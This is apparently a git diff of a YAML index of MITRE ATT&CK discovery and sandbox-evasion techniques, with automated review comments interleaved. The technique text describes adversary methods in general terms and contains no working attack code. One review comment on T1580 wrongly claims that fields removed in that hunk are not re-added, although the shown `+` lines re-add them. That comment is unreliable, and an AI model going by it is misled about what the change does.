Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49635,122 +50332,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
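Review bot: git has paired T1087.003's removed leading keys and references against T1497.003's added ones, so this block reads as a wholesale rewrite although the substantive changes are small: the description typo fix (`theGet-GlobalAddressList` to `the Get-GlobalAddressList`), the Prevailion URL switched to a web.archive.org snapshot, T1087.003's platforms reduced to `Windows` and `Office Suite`, and `x_mitre_permissions_required` dropped. Two points to check: T1016.001 earlier in the patch still carries `x_mitre_permissions_required: - User`, so the field's removal is not uniform across objects; and the archive snapshot is the right pattern for a reference whose original host no longer serves it, so the other reference URLs touched in this patch deserve the same resolvability check. Reviewing the two objects with a semantic YAML diff, or regenerating with stable key order, would have kept the real changes visible.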
@@ -49765,6 +50413,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -49774,9 +50428,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -49786,102 +50445,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
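Review bot: the `-` lines for T1580 drop `name`, `description`, `modified`, `created_by_ref`, `x_mitre_detection`, `kill_chain_phases`, `x_mitre_is_subtechnique` and `x_mitre_data_sources`, and nothing in this hunk's `+` lines re-emits them; if they are re-emitted earlier in the object (the same key shuffle happens for T1497 and T1087.004 later in this diff, where the removed block reappears at the end of the object) please say so in the commit message, otherwise T1580 is left with only references, markings and `x_mitre_attack_spec_version: 3.2.0`. The `+ url:` moves at the top of the hunk are pure reference reordering (description before url) and carry no content change.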
@@ -49935,7 +50629,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
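Review bot: `modified` goes backwards here (`2023-05-09T14:00:00.188Z` to `2023-04-16T14:24:40.625Z`), and the same regression recurs for T1482, T1049, T1619, T1069.001 and T1614.001 below. Every old value ends in `14:00:00.188Z`, which looks like a normalized placeholder rather than a real STIX timestamp, so the new values are plausibly the upstream ones, but the commit should name the ATT&CK bundle version this was regenerated from. Dropping `spec_version: '2.1'` from every technique object is also a schema change for anything that validates these entries as STIX 2.1; worth a line in the changelog.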
@@ -49965,7 +50658,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
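Review bot: the `+` line has unbalanced braces, `{{LinkById|T1059.008}` opens two and closes one, and neither this nor the old `(LinkById: T1059.008)` form is a working link, while the rest of the same sentence uses resolved markdown links such as `[PowerShell](https://attack.mitre.org/techniques/T1059/001)`. If the text is copied verbatim from upstream, do not hand-patch generated data, but have the generator resolve `LinkById` tokens to the markdown form used elsewhere, and report the stray brace upstream.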
@@ -50003,12 +50696,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50035,14 +50727,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
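Review bot: the platform list for T1087 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (version 2.4 to 2.5). Any consumer or index that filters techniques by the old platform strings will silently stop matching T1087 (the same rename is applied to T1087.004 and T1201 further down); make sure every platform-keyed index in the repo is regenerated in the same change and that the generator knows the new names.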
@@ -50071,7 +50762,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
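Review bot: T1087 has no `identifier:` line between `x_mitre_modified_by_ref` and `atomic_tests: []`, whereas T1016, T1217 and T1482 in this diff carry `identifier: T1016` and so on. This is pre-existing (those are context lines) and the same omission shows for T1497, T1087.004 and T1497.002 below, so it is a generator bug rather than something introduced here, but since this change touches every object it is a good moment to fix it.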
@@ -50131,7 +50821,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
@@ -50150,7 +50840,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -50219,12 +50908,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -50301,40 +50989,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
